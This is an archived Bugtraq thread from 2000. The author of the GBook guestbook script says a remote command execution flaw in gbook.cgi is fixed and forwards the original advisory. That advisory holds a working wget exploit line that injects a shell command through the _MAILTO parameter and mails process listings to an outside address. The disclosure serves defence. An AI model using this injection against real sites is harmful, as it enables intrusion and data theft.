Home page logo

bugtraq logo Bugtraq mailing list archives

Re: [hacksware] gbook.cgi remote command execution vulnerability [FIXED]
From: William Kendrick <nbs () SONIC NET>
Date: Sat, 11 Nov 2000 19:00:58 -0800

So far as I can tell, it's fixed...  Please let me know if anyone
sees any other glaring holes.  It IS rather ancient software.


Forwarded message:
From mbrennen () fni com  Sat Nov 11 10:28:17 2000
X-envelope-info: <mbrennen () fni com>
Date: Sat, 11 Nov 2000 12:30:28 -0600 (CST)
From: Michael Brennen <mbrennen () fni com>
To: William Kendrick <nbs () sonic net>
Cc: mat () hacksware com
Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability
In-Reply-To: <200011110920.eAB9KVL11974 () sonic net>
Message-ID: <Pine.LNX.4.21.0011111230000.27066-100000 () henry fni com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

You might want to post this to bugtraq.

   -- Michael

On Sat, 11 Nov 2000, William Kendrick wrote:

Should be fixed, thanks.

I wonder why I wasn't informed directly!  My @zippy.sonoma.edu address
_should_ still be getting forwarded to my new addr.

New download available at:


Modification date: November 11, 2000.


Don't know if you saw this or not; you probably have by now.  There
are a couple of vulnerable sprintf() also that should be replaced by

   -- Michael

---------- Forwarded message ----------
Date: Fri, 10 Nov 2000 20:38:44 +0900
From: JW Oh <mat () IVNTECH COM>
Subject: [hacksware] gbook.cgi remote command execution vulnerability

   Bug Report

1. Name: gbook.cgi remote command execution vulnerability
2. Release Date: 2000.11.10
3. Affected Application:
  GBook - A web site guestbook
     By Bill Kendrick
     kendrick () zippy sonoma edu
4. Author: mat () hacksware com
5. Type: Input validation Error

6. Explanation
 gbook.cgi is used by some web sites.
 We can set _MAILTO parameter, and popen is called to execute mail command.
 If ';' is used in _MAILTO variable, you can execute arbitrary command with it.
 It's so trivial. :)
7. Exploits
 This exploit executes "ps -ax" command and sends the result to haha () yaho com 

 wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha () yaho 
yaho com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few";

|               mat () hacksware com               |
|             http://hacksware.com              |

  By Date           By Thread  

Current thread:
  • Re: [hacksware] gbook.cgi remote command execution vulnerability [FIXED] William Kendrick (Nov 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]